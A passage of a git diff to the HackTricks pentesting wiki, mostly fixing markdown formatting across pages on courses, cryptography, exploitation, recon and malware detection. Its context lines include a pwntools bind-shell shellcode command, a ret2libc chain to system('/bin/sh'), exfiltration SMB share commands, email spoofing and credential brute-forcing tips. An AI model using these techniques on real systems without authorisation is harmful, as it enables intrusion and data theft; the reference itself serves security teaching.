(eMAPT) and the respective INE courses -### Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting)**** +### Course: [**Android & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/cfd5ec2b/android-mobile-app-pentesting) This is the course to **prepare for the eMAPT certificate exam**. It will teach you the **basics of Android** as OS, how the **applications works**, the **most sensitive components** of the Android applications, and how to **configure and use** the main **tools** to test the applications. The goal is to **prepare you to be able to pentest Android applications in the real life**. @@ -11,7 +11,7 @@ I found the course to be a great one for **people that don't have any experience Finally, note **two more things** about this course: It has **great labs to practice** what you learn, however, it **doesn't explain every possible vulnerability** you can find in an Android application. Anyway, that's not an issue as **it teach you the basics to be able to understand other Android vulnerabilities**.\ Besides, once you have completed the course (or before) you can go to the [**Hacktricks Android Applications pentesting section**](../mobile-apps-pentesting/android-app-pentesting/) and learn more tricks. -### Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting)**** +### Course: [**iOS & Mobile App Pentesting**](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting) When I performed this course I didn't have much experience with iOS applications, and I found this **course to be a great resource to get me started quickly in the topic, so if you have the chance to perform the course don't miss the opportunity.** As the previous course, this course will teach you the **basics of iOS**, how the **iOS** **applications works**, the **most sensitive components** of the applications, and how to **configure and use** the main **tools** to test the applications.\ However, there is a very important difference with the Android course, if you want to follow the labs, I would recommend you to **get a jailbroken iOS or pay for some good iOS emulator.** @@ -33,7 +33,7 @@ In this exam I **missed the opportunity to exploit more vulnerabilities**, howev ## eLearnSecurity Web application Penetration Tester eXtreme (eWPTXv2) and the INE course related -### Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme)**** +### Course: [**Web Application Penetration Testing eXtreme**](https://my.ine.com/CyberSecurity/courses/630a470a/web-application-penetration-testing-extreme) This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**. \ Even having been working as web pentester for several years before doing the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains **pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities. @@ -56,7 +56,7 @@ It's a very interesting basic course about **how to use the ML environment provi ## Course: **Machine Learning with scikit-learn Starter Pass** -In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**. +In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**. It's definitely recommended for people that haven't use scikit-learn (but know python) @@ -74,4 +74,4 @@ It also explains **how to create tree models** with scikit-learn different techn The only drawback I could find was in some cases some lack of mathematical explanations about how the used algorithm works. However, this course is **pretty useful for people that are learning about Machine Learning**. -## +## diff --git a/cryptography/certificates.md b/cryptography/certificates.md index 79ac4265..a2c285ac 100644 --- a/cryptography/certificates.md +++ b/cryptography/certificates.md @@ -43,7 +43,7 @@ The most common format for public key certificates is defined by [X.509](https:/ * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `TLS Web Server Authentication` * **Subject Alternative Name:** Allows users to specify additional host **names** for a single SSL **certificate**. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common **name**. * **Basic Constraint:** This extension describes whether the certificate is a CA certificate or an end entity certificate. A CA certificate is something that signs certificates of others and a end entity certificate is the certificate used in a web page for example (the last par of the chain). - * **Subject Key Identifier** (SKI): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** (AKI) extension on issued certificates. It's the hash of the subject public key. + * **Subject Key Identifier** (SKI): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** (AKI) extension on issued certificates. It's the hash of the subject public key. * **Authority Key Identifier**: It contains a key identifier which is derived from the public key in the issuer certificate. It's the hash of the issuer public key. * **Authority Information Access** (AIA): This extension contains at most two types of information : * Information about **how to get the issuer of this certificate** (CA issuer access method) diff --git a/cryptography/cipher-block-chaining-cbc-mac-priv.md b/cryptography/cipher-block-chaining-cbc-mac-priv.md index 9cedd5e2..224316fc 100644 --- a/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/cryptography/cipher-block-chaining-cbc-mac-priv.md @@ -34,7 +34,7 @@ Imagine you are encrypting the name **Administrator** in **8bytes** blocks: You can create a username called **Administ** (m1) and retrieve the signature (s1).\ Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\ -now, you can use s32 as the singature of the full name **Administrator**. +now, you can use s32 as the signature of the full name **Administrator**. #### Summary diff --git a/cryptography/crypto-ctfs-tricks.md b/cryptography/crypto-ctfs-tricks.md index ee25be69..9d21ef72 100644 --- a/cryptography/crypto-ctfs-tricks.md +++ b/cryptography/crypto-ctfs-tricks.md @@ -16,9 +16,9 @@ ## Magic Autosolvers -* ****[**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)**** -* ****[https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)**** (Magic module) -* ****[https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)**** +* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic module) +* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) ## Encoders diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md index af12e297..d84c77d8 100644 --- a/cryptography/hash-length-extension-attack.md +++ b/cryptography/hash-length-extension-attack.md @@ -7,7 +7,7 @@ Imagine a server which is **signing** some **data** by **appending** a **secret* * **The length of the secret** (this can be also bruteforced from a given length range) * **The clear text data** * **The algorithm (and it's vulnerable to this attack)** -* **The padding is known** +* **The padding is known** * Usually a default one is used, so if the other 3 requirements are met, this also is * The padding vary depending on the length of the secret+data, that's why the length of the secret is needed diff --git a/cryptography/rc4-encrypt-and-decrypt.md b/cryptography/rc4-encrypt-and-decrypt.md index 59258670..b17676a3 100644 --- a/cryptography/rc4-encrypt-and-decrypt.md +++ b/cryptography/rc4-encrypt-and-decrypt.md @@ -8,5 +8,5 @@ If you can encrypt a known plaintext you can also extract the password. More ref {% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %} -**** + diff --git a/emails-vulns.md b/emails-vulns.md index bc6d1ead..5078fbf8 100644 --- a/emails-vulns.md +++ b/emails-vulns.md @@ -8,7 +8,7 @@ The symbols: **+, -** and **{}** in rare occasions can be used for tagging and i * E.g. john.doe+intigriti@example.com → john.doe@example.com -**Comments between parentheses ()** at the beginning or the end will also be ignored +**Comments between parentheses ()** at the beginning or the end will also be ignored * E.g. john.doe(intigriti)@example.com → john.doe@example.com @@ -46,7 +46,7 @@ You can send an email using _**From: company.com**_** ** and _**Replay-To: attac ## **References** -* ****[**https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view**](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)**** +* [**https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view**](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view) ## Hard Bounce Rate diff --git a/exfiltration.md b/exfiltration.md index a1d0ead3..6120f9d8 100644 --- a/exfiltration.md +++ b/exfiltration.md @@ -151,7 +151,7 @@ kali_op2> smbserver.py -smb2support name /path/folder # Share a folder impacket-smbserver -smb2support -user test -password test test `pwd` ``` -Or create a \*\*smb \*\*share **using samba**: +Or create a **smb **share **using samba**: ```bash apt-get install samba diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md index 2c77353d..3696a277 100644 --- a/exploiting/linux-exploiting-basic-esp/README.md +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -51,7 +51,7 @@ int i = 5; Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso. -\*\*\*\* + Para obtener la dirección de una función dentro de un programa se puede hacer: @@ -250,7 +250,7 @@ Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecuci RELLENO -* Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: (\&system() + \&leave;ret + &“/bin/sh”) +* Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: (\&system() + \&leave;ret + &“/bin/sh”) * En el EIP ponemos de dirección una función &(leave;ret) Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + \&system() + &(leave;ret;) + &”/bin/sh” @@ -657,7 +657,7 @@ So what's the **bypass**? The typical bypass I use is to just don't write to mem Note that in order for this to happen the binary needs to know previous to execution the addresses to the functions: * Lazy binding: The address of a function is searched the first time the function is called. So, the GOT needs to have write permissions during execution. -* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. `` `** ``-z relro`**`y`**`-z now\`\*\* +* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. `` `** ``-z relro`**`y`**`-z now\`** To check if a program uses Bind now you can do: @@ -665,7 +665,7 @@ To check if a program uses Bind now you can do: readelf -l /proc/ID_PROC/exe | grep BIND_NOW ``` -\*\*\*\* + Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT (Procedure Linkage Table), de aquí se realiza un salto (jmp) a la GOT y descubre que esa entrada no ha sido resuelta (contiene una dirección siguiente de la PLT). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT. @@ -1072,4 +1072,4 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu ## **References** -* \*\*\*\*[**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html)\*\*\*\* +* [**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html) diff --git a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md index 7f4a85c3..f868d932 100644 --- a/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md +++ b/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md @@ -175,7 +175,7 @@ ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) archive-glibc (id libc6_2.23-0ubuntu11_amd64) ``` -We get 2 matches (you should try the second one if the first one is not working). Download the first one: +We get 2 matches (you should try the second one if the first one is not working). Download the first one: ``` ./download libc6_2.23-0ubuntu10_amd64 @@ -204,7 +204,7 @@ At this point we should know the libc library used. As we are exploiting a local So, at the begging of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it` -Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**. +Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**. Inside the `get_addr`function the **base address of libc** is going to be calculated: diff --git a/exploiting/tools/README.md b/exploiting/tools/README.md index b1bc7e4f..b1eb2e2e 100644 --- a/exploiting/tools/README.md +++ b/exploiting/tools/README.md @@ -115,7 +115,7 @@ While debugging GDB will have **slightly different addresses than the used by th * `unset env COLUMNS` * `set env _=` _Put the absolute path to the binary_ * Exploit the binary using the same absolute route -* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary +* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary #### Backtrace to find functions called @@ -140,7 +140,7 @@ gef➤ bt ### Find stack offset **Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\ -****For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\ +For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._ ![](<../../.gitbook/assets/image (616).png>) @@ -202,6 +202,6 @@ Inside the IDA folder you can find binaries that can be used to debug a binary i ./linux_server64 -Ppass ``` - Then, configure the debugger: Debugger (linux remote) --> Proccess options...: +Then, configure the debugger: Debugger (linux remote) --> Proccess options...: ![](<../../.gitbook/assets/image (101).png>) diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md index 9f3754c5..dd6f1a3e 100644 --- a/exploiting/tools/pwntools.md +++ b/exploiting/tools/pwntools.md @@ -4,25 +4,25 @@ pip3 install pwntools ``` -## Pwn asm +## Pwn asm -Get opcodes from line or file. +Get opcodes from line or file. ``` pwn asm "jmp esp" pwn asm -i ``` -**Can select:** +**Can select:** * output type (raw,hex,string,elf) * output file context (16,32,64,linux,windows...) -* avoid bytes (new lines, null, a list) +* avoid bytes (new lines, null, a list) * select encoder debug shellcode using gdb run the output -## **Pwn checksec** +## **Pwn checksec** -Checksec script +Checksec script ``` pwn checksec @@ -30,7 +30,7 @@ pwn checksec ## Pwn constgrep -## Pwn cyclic +## Pwn cyclic Get a pattern @@ -39,7 +39,7 @@ pwn cyclic 3000 pwn cyclic -l faad ``` -**Can select:** +**Can select:** * The used alphabet (lowercase chars by default) * Length of uniq pattern (default 4) @@ -56,21 +56,21 @@ pwn debug --pid 1234 pwn debug --process bash ``` -**Can select:** +**Can select:** -* By executable, by name or by pid context (16,32,64,linux,windows...) -* gdbscript to execute +* By executable, by name or by pid context (16,32,64,linux,windows...) +* gdbscript to execute * sysrootpath -## Pwn disablenx +## Pwn disablenx -Disable nx of a binary +Disable nx of a binary ``` pwn disablenx ``` -## Pwn disasm +## Pwn disasm Disas hex opcodes @@ -78,13 +78,13 @@ Disas hex opcodes pwn disasm ffe4 ``` -**Can select:** +**Can select:** -* context (16,32,64,linux,windows...) -* base addres +* context (16,32,64,linux,windows...) +* base addres * color(default)/no color -## Pwn elfdiff +## Pwn elfdiff Print differences between 2 fiels @@ -92,7 +92,7 @@ Print differences between 2 fiels pwn elfdiff ``` -## Pwn hex +## Pwn hex Get hexadecimal representation @@ -100,25 +100,25 @@ Get hexadecimal representation pwn hex hola #Get hex of "hola" ascii ``` -## Pwn phd +## Pwn phd -Get hexdump +Get hexdump ``` pwn phd ``` - **Can select:** +**Can select:** -* Number of bytes to show -* Number of bytes per line highlight byte +* Number of bytes to show +* Number of bytes per line highlight byte * Skip bytes at beginning -## Pwn pwnstrip +## Pwn pwnstrip ## Pwn scrable -## Pwn shellcraft +## Pwn shellcraft Get shellcodes @@ -136,18 +136,18 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port * Out file * output format * debug (attach dbg to shellcode) -* before (debug trap before code) +* before (debug trap before code) * after * avoid using opcodes (default: not null and new line) * Run the shellcode * Color/no color -* list syscalls -* list possible shellcodes +* list syscalls +* list possible shellcodes * Generate ELF as a shared library -## Pwn template +## Pwn template -Get a python template +Get a python template ``` pwn template @@ -155,15 +155,15 @@ pwn template **Can select:** host, port, user, pass, path and quiet -## Pwn unhex +## Pwn unhex -From hex to string +From hex to string ``` pwn unhex 686f6c61 ``` -## Pwn update +## Pwn update To update pwntools diff --git a/external-recon-methodology.md b/external-recon-methodology.md index 463156c4..c0617874 100644 --- a/external-recon-methodology.md +++ b/external-recon-methodology.md @@ -33,8 +33,8 @@ An autonomous system number \(**ASN**\) is a **unique number** assigned to an ** An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators. It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs. -**\*\*You can search by** company name**, by** IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net/)**. -Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net/) **\(Africa\),** [**Arin**](https://www.arin.net/about/welcome/region/)**\(North America\),** [**APNIC**](https://www.apnic.net/) **\(Asia\),** [**LACNIC**](https://www.lacnic.net/) **\(Latin America\),** [**RIPE NCC**](https://www.ripe.net/) **\(Europe\). Anyway, probably all the** useful information **\(IP ranges and Whois\)** appears already in the first link\*\*. +You can search by** company name**, by** IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net/)**. +Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net/) **\(Africa\),** [**Arin**](https://www.arin.net/about/welcome/region/)**\(North America\),** [**APNIC**](https://www.apnic.net/) **\(Asia\),** [**LACNIC**](https://www.lacnic.net/) **\(Latin America\),** [**RIPE NCC**](https://www.ripe.net/) **\(Europe\). Anyway, probably all the** useful information **\(IP ranges and Whois\)** appears already in the first link**. ```bash #You can try "automate" this with amass, but it's not very recommended @@ -48,8 +48,8 @@ You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4 ### Looking for vulnerabilities At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts. -Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) **\*\*or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**. -Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce\*\* services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). +Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**. +Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce** services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). ## Domains @@ -81,8 +81,8 @@ You can use online tools like: * [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free** * [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Free** * [https://www.reversewhois.io/](https://www.reversewhois.io/) - **Free** -* \*\*\*\*[https://www.whoxy.com/](https://www.whoxy.com/) - **Free** web, not free API. -* \*\*\*\*[http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com/) - Not free +* [https://www.whoxy.com/](https://www.whoxy.com/) - **Free** web, not free API. +* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com/) - Not free * [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free \(only **100 free** searches\) * [https://www.domainiq.com/](https://www.domainiq.com/) - Not Free @@ -98,10 +98,10 @@ For example, if you see the same **Google Analytics ID** or the same **Adsense I There are some pages that let you search by these trackers and more: -* [**BuiltWith**](https://builtwith.com/)\*\*\*\* -* \*\*\*\*[**Sitesleuth**](https://www.sitesleuth.io/)\*\*\*\* -* \*\*\*\*[**Publicwww**](https://publicwww.com/)\*\*\*\* -* \*\*\*\*[**SpyOnWeb**](http://spyonweb.com/)\*\*\*\* +* [**BuiltWith**](https://builtwith.com/) +* [**Sitesleuth**](https://www.sitesleuth.io/) +* [**Publicwww**](https://publicwww.com/) +* [**SpyOnWeb**](http://spyonweb.com/) ### **Favicon** @@ -300,7 +300,7 @@ cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 a Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just **taking a look** to the **main page** of all of them you could find **weird** endpoints more **prone** to be **vulnerable**. -To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), **\*\*\[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**, **\[**shutter**\]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**\) \*\***or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** +To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), \[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**, **\[**shutter**\]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**\) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** ## Recapitulation 1 @@ -350,7 +350,7 @@ Now that we have built the list of assets of our scope it's time to search for s You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth_key) -## [**Pentesting Web Methodology**](pentesting/pentesting-web/)\*\*\*\* +## [**Pentesting Web Methodology**](pentesting/pentesting-web/) Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](pentesting/pentesting-web/). diff --git a/external-recon-methodology/README.md b/external-recon-methodology/README.md index 8c14e8df..c50e481d 100644 --- a/external-recon-methodology/README.md +++ b/external-recon-methodology/README.md @@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} @@ -39,7 +39,7 @@ An autonomous system number (**ASN**) is a **unique number** assigned to an **au An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators. It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.\ -**You can search by** company name\*\*, by\*\* IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net)**.**\ +**You can search by** company name**, by** IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net)**.**\ **Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net) **(Africa),** [**Arin**](https://www.arin.net/about/welcome/region/)**(North America),** [**APNIC**](https://www.apnic.net) **(Asia),** [**LACNIC**](https://www.lacnic.net) **(Latin America),** [**RIPE NCC**](https://www.ripe.net) **(Europe). Anyway, probably all the** useful information **(IP ranges and Whois)** appears already in the first link. ```bash @@ -54,7 +54,7 @@ You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4 ### Looking for vulnerabilities At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\ -Also, you could launch some [**port scans**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running\*\*.\*\*\ +Also, you could launch some [**port scans**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**.**\ **Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). ## Domains @@ -320,7 +320,7 @@ cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 a Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**. -To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), **\*\*\[shutter]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**) \*\***or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** +To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), \[shutter]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** ## Cloud Assets diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md index 8147b692..eb0a7f0c 100644 --- a/forensics/basic-forensic-methodology/malware-analysis.md +++ b/forensics/basic-forensic-methodology/malware-analysis.md @@ -70,11 +70,11 @@ IOC means Indicator Of Compromise. An IOC is a set of **conditions that identifi To share these definitions is very useful as when a malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster. A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\ -****You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**. +You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**. ### Loki -****[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\ +[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\ Detection is based on four detection methods: ``` @@ -93,7 +93,7 @@ Detection is based on four detection methods: ### Linux Malware Detect -****[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. +[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. ### rkhunter @@ -107,13 +107,13 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk [PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules). -### NeoPI +### NeoPI -****[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**. +[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**. ### **php-malware-finder** -****[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells. +[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells. ### Apple Binary Signatures diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md index 0dbc4bb4..38b945fb 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md @@ -368,7 +368,7 @@ volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3 ### UserAssist - **Windows** systems maintain a set of **keys** in the registry database (**UserAssist keys**) to keep track of programs that executed. The number of executions and last execution date and time are available in these **keys**. +**Windows** systems maintain a set of **keys** in the registry database (**UserAssist keys**) to keep track of programs that executed. The number of executions and last execution date and time are available in these **keys**. {% tabs %} {% tab title="vol3" %} diff --git 